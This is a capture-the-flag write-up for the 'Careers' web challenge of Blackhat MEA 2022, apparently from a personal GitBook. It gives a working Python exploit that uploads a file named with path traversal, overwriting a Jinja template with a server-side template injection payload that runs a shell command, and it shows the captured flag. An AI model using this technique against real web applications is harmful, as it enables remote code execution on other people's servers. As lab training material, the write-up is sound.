Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • BlachatMEA Finals 2024
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BlackhatMEA Finals 2024
      • PWN
    • BITSCTF - Reverse Mishap
    • Cybernights 2025
      • REVERSE
      • PWN
    • BYUCTF 2025
      • PWN
Powered by GitBook
On this page
  • Description
  • Structure
  • Solution
  • Explanation

Was this helpful?

  1. CTF
  2. Technology Control Company
  3. Blackhat MEA 2022

Careers

PreviousCTF Setup on Kali linuxNextSOC Complaints

Last updated 2 years ago

Was this helpful?

IPAddress 172.20.0.3 Port 80 URL

Description

Find and apply to career opportunities at TCC.

Structure

.
├── app
│   ├── __init__.py
│   ├── routes.py
│   ├── static
│   │   └── assets
│   │       ├── css
│   │       │   └── careers.css
│   │       ├── img
│   │       │   └── construction.jpg
│   │       └── js
│   ├── templates
│   │   ├── includes
│   │   │   ├── footer.html
│   │   │   ├── header.html
│   │   │   └── scripts.html
│   │   ├── index.html
│   │   └── layouts
│   │       └── base.html
│   ├── uploads
│   └── views.py
├── flag.txt
└── run.py
10 directories, 12 files

Solution

Install pip for python

sudo apt install python3-pip

Install requests for the exploit

python3 -m pip install requests

Exploit

from requests import post, get

filename = '../templates/index.html' # the index.html template path to overwrite

payload = b'{{ cycler.__init__.__globals__.os.popen(\'cat /usr/src/app/flag.txt\').read() }}' # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
files = {'file': (filename, payload, 'text/html')}

url = 'http://172.20.0.3/'
endpoint = '/api/v1/upload/resume'

response = post(url + endpoint, files = files)

response = get(url)
print(f'Flag: {response.text}')

Flag

└─$ python3 exploit.py 
Flag: TCC{34$Y_USE_SECURE_FILENAME}

Explanation

http://172.20.0.3/
What is server-side template injection?
Server-side template injection payloads
Path Traversal
Unrestricted File Upload